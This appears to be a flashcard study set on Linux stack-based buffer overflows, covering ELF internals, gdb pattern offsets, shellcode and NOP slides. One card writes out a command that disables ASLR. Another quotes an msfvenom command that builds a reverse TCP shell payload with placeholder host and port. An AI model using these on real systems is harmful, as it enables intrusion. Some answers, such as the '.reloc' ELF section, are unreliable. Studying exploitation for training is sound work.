Linux Stack Smashing

Question 1

this two program traces library or system calls performed by the target binary

Answer 1

ltrace / strace

Question 2

displays an information about an ELF file

Answer 2

readelf

Question 3

What does ELF stands for in linux

Answer 3

Executable and Linkable Format

Question 4

This one is used to display informatin about object files. Can also be used for disassembling Linux executables

Answer 4

objdump

Question 5

extracts readable strings from a binary.

Answer 5

strings

Question 6

The ELF file is consist of this two

Answer 6

ELF header and ELF data

Question 7

An ELF header contains important information for the OS on how to handle the file. This is one of the most important parts of the header.

The header starts with what hex sequence?

Answer 7

7f 45 4c 46

Question 8

In ELF header, this defines the target architecture

Answer 8

Class

Question 9

In ELF header, this refers to the type of endianness (litte or big)

Answer 9

Data

Question 10

This are the products of memory corruptions. Which then can be fed to gdb in order to examine crashed programs more accurately

Answer 10

Core Dumps

Question 11

This is responsible for taking the name of functions and linking them to their actual locations in memory.

Answer 11

Linkers

Question 12

During a call to a function, this is responsible for locating its memory address within a system library and then writing it to the process memory of the executable, so that the function can be accessed at that address.

Answer 12

Linkers

Question 13

The task of this is to load programs from storage into memory.

Answer 13

loader

Question 14

This means moving the module to another place in memory to avoid address collisions.

Answer 14

Relocation

Question 15

The ELF file contains this section. Whenever the desired loading address is unavailable, this section is responsible for patching that program with new address.

Answer 15

.reloc

Question 16

In order to be able to do patching the program with new addresses. This is used to describe the address of the program functions.

Answer 16

relative addressing.

Question 17

This describes a function address by the offset from the loading base address and not by the full address.

Answer 17

Relative addressing

For example, if the relative virtual address of a function is 0x123 and its program is loaded at 0x804000, the function can be found at 0x804123.

Question 18

This are the descriptions of the executable code and include, among others, functions and variable names. This makes debugging a lot easier since many function and variable names give a hint on what they are supposed to do; for example, finding functions named
getName() or printName(), can save us from a lot of reverse engineering activities.

Answer 18

Symbols

Question 19

This is the process of removing symbols from an ELF file.

Answer 19

stripping

Question 20

This can be mapped directly into memory upon executions

Answer 20

Executable files (EXEC)

Question 21

This are executable supporting the relocation process

Answer 21

Relocatable files (REL)

Question 22

This are libraries of functions. From technical perspective, they contains sections typical for both executable and relocatable files. They can often be recognize by their .so extension.

Answer 22

Shared objects (DYN)

Question 23

This are some standard places within ELF file that play a certain role in its functionalities. Upon startup, this are mapped into the process memory.

Answer 23

Sections

Question 24

This means storing them in the memory of a newly created process with respect to their size and contained data.

Answer 24

Mapping

Question 25

According to this, while a program is running and data from certain section should be used, operations on those areas may or may not be restricted.

Answer 25

Permissions

Question 26

This section contains initialized data with read/write access rights.

Answer 26

.data

Question 27

This section contains initialized data with read only access rights.

Answer 27

.rodata

Question 28

This section contains uninitialized data with read and write access rights.

Answer 28

.bss

Question 29

One of the sections that are important to every executable, this section holds the addresses of the function.

Answer 29

.GOT(Global Offset Table)

Question 30

This is also a section important on an executable, this holds the function stubs that point to the .GOT entry

Answer 30

.PLT(Procedure Linkage Table)

Question 31

If you run a SUID root program, this program runs with what privileges?

Answer 31

root

Question 32

If you run a SGID program, the program runs with priveleges of what?

Answer 32

the group ( runs as if you were a member of that)

Question 33

This is an area of memory within a process that is used by the process itself to save data. Contrary to registers which are small in size but the fastest among all temporary data storages, this offers a larger space.

Answer 33

Stack

Question 34

This is where the program will return once the a function is finished.

Answer 34

Return Address

Question 35

On 32 bit system, the stack alignment is?

Answer 35

4-byte or double word

Question 36

The stack grows towards higher/lower address?

Answer 36

lower addresses

This means that if the first element that is pushed onto the stack has an address of 0xbffffff8, then it will occupy the space between 0xbffffff8 and 0xbffffff5. The next element pushed on the stack will start at 0xbffffff4.

Question 37

This occurs due to programmatic error. This may happen, when the program is insecurely handling user-supplied data.

Answer 37

Stack overflow also called buffer overflow/stack-based buffer overflow.

Question 38

This command disable the ASLR on linux machine (Ubuntu 32-bit)

Answer 38

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Question 39

This is a type of ELF file that is created upon a segmentation fault (memory corruption) being encountered within a binary.

Answer 39

Core Dump

Question 40

This is a gdb commands that allows you to create a pattern. Same at pattern_create.rb on Metasploit. Show how to create 700 pattern on gdb.

Answer 40

pattern create 700 pattern.txt

Question 41

This command in GDB allows you to determine the offset to the EIP.

Answer 41

pattern offset [address]

Question 42

This is a piece of code within a program that is not used, which may happen, due to a developer’s not removing unused functions.

Answer 42

Dead Code

Question 43

If you do not have the source code of your target program and the binary is not stripped, you can try to locate the existing functions using this command in GDB

Answer 43

info functions

Question 44

Is a set of instruction that is used to execute certain actions within the program.

Answer 44

Shellcode.

Question 45

In the command “msfvenom -p linux/x86/shell_reverse_tcp lhost=YOURIP lport=YOURPORT -b’\x00’ -f python”

What is the purpose of “-b”??

Answer 45

Specify bad characters

Question 46

The original purpose of this instruction was to help with measuring processor performance by performing just an empty cycle.

Answer 46

NOP - No-Operation Instruction

Question 47

What is the opcode of NOP

Answer 47

0x90

Question 48

This is the term called on a long sequence of NOPs

Answer 48

NOP Slide